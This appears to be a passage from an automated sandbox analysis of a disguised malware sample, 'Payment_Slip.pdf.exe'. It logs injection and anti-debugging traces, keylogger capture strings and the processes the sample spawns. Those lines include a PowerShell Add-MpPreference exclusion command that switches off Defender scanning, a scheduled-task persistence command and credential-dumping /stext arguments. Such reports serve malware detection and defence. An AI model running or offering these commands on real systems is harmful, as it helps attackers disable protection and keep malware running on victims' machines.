                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599764
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599656
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599546
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599437
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599328
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599218
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599109
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598999
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598889
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598781
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598669
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598562
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598453
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598343
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598234
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598124
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598012
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597906
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597796
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597397
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597281
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597171
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597062
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596952
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596843
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596734
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596624
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596515
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596406
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596296
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596187
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596077
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595968
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595859
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595749
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595640
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595531
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595421
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595312
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595202
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595041
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 594935
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 594820
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 594718
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1200000
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199890
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199781
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199672
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199530
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 600000
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599875
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599765
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599656
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599547
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599437
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599328
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599219
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599109
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599000
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598890
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598781
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598662
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598531
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598422
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598250
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598124
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598015
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597906
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597797
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597687
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597578
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597468
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597358
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597250
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597140
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597029
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596921
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596812
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596703
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596593
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596484
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596375
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596265
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596156
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596046
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595937
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595827
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595714
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595588
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595359
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595250
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0{?
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1191644087.0000000008250000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: E6m03XlgugbphGFSZxI
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3614283187.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2826846976.000001F041652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: svchost.exe, 0000000A.00000002.2826136324.000001F03C02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP`eA
                              Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                              Source: Windows Update.exe, 0000001A.00000002.3641937968.0000000006060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
                              Source: Payment_Slip.pdf.exe, 00000000.00000002.1185558701.0000000000745000.00000004.00000020.00020000.00000000.sdmp, mHTmhPhJy.exe, 00000007.00000002.1239687916.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3611941996.0000000000903000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3611272951.0000000000752000.00000004.00000020.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3654737637.0000000006330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeAPI call chain: ExitProcess graph end node
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_0682B960 LdrInitializeThunk,13_2_0682B960
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_004327AE
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041A8DA
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004407B5 mov eax, dword ptr fs:[00000030h]11_2_004407B5
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004407B5 mov eax, dword ptr fs:[00000030h]17_2_004407B5
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,11_2_00410763
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Roaming\host.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_004327AE
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004328FC SetUnhandledExceptionFilter,11_2_004328FC
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_004398AC
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00432D5C
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_004327AE
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004328FC SetUnhandledExceptionFilter,17_2_004328FC
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_004398AC
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00432D5C
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeMemory written: C:\Users\user\Desktop\Payment_Slip.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeMemory written: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: NULL target: C:\Users\user\Desktop\Payment_Slip.pdf.exe protection: execute and read and writeJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: NULL target: C:\Users\user\Desktop\Payment_Slip.pdf.exe protection: execute and read and writeJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and writeJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeSection unmapped: C:\Windows\SysWOW64\schtasks.exe base address: 400000Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe11_2_00410B5C
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe17_2_00410B5C
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004175E1 mouse_event,11_2_004175E1
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\AppData\Roaming\host.exe "C:\Users\user\AppData\Roaming\host.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\conserver.exe "C:\Users\user\AppData\Local\Temp\conserver.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs"Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeProcess created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"Jump to behavior
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerFD\
                              Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>rTH
                              Source: mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}r@\
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>rTH
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>rTH
                              Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br>t-
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>TH
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}TH
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}TH
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}rTH
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>r<br><b>[ Microsoft
                              Source: host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}TH
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>r
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>@\
                              Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>TH
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002751000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
                              Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>TH
                              Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>LR
                              Source: mykksg.exe, 00000019.00000002.3621446588.0000000002689000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>@\
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br>
                              Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br>
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}rTH
                              Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>rTH
                              Source: mykksg.exe, 00000019.00000002.3621446588.0000000002689000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}TH
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                              Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>@\
                              Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:54:37)</font></font><br>LR
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>r<br>t-
                              Source: host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<LR
                              Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>rTH
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}rTH
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>r<br><font color="#00b1ba"><b>[ Microsoft
                              Source: host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}r
                              Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>TH
